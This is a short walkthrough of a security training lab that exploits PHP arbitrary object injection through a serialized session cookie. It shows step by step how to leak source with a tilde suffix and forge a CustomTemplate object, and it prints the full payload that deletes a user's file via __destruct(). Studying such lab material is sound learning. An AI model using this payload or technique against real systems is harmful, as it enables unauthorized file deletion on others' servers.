18.4 Lab: Arbitrary object injection in PHP
This lab uses a serialization-based session mechanism and is vulnerable to arbitrary object injection as a result. To solve the lab, create and inject a malicious serialized object to delete the morale.txt file from Carlos’s home directory. You will need to obtain source code access to solve this lab | Karthikeyan Nagaraj
2 min readJul 2, 2024
Description
This lab uses a serialization-based session mechanism and is vulnerable to arbitrary object injection as a result. To solve the lab, create and inject a malicious serialized object to delete the morale.txt
file from Carlos's home directory. You will need to obtain source code access to solve this lab.
You can log in to your own account using the following credentials: wiener:peter
Solution
- Log in to your own account and notice the session cookie contains a serialized PHP object.
- Go to site map in Target tab, notice that the website references the file
/libs/CustomTemplate.php
. Right-click on the file and select "Send to Repeater". - In Burp Repeater, notice that you can read the source code by appending a tilde (
~
) to the filename in the request line. - In the source code, notice the
CustomTemplate
class contains the__destruct()
magic method. This will invoke theunlink()
method on thelock_file_path
attribute, which will delete the file on this path. - In Burp Decoder, use the correct syntax for serialized PHP data to create a
CustomTemplate
object with thelock_file_path
attribute set to/home/carlos/morale.txt
. Make sure to use the correct data type labels and length indicators. The final object should look like this:O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";}
- Send
/my-account
request to repeater, select the cookie and paste the above object in Decode panel in the right side. - Click Apply changes and send the request. The
__destruct()
magic method is automatically invoked and will delete Carlos's file.
A YouTube Channel for Cybersecurity Lab’s Poc and Write-ups
Telegram Channel for Free Ethical Hacking Dumps
Thank you for Reading!
Happy Ethical Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng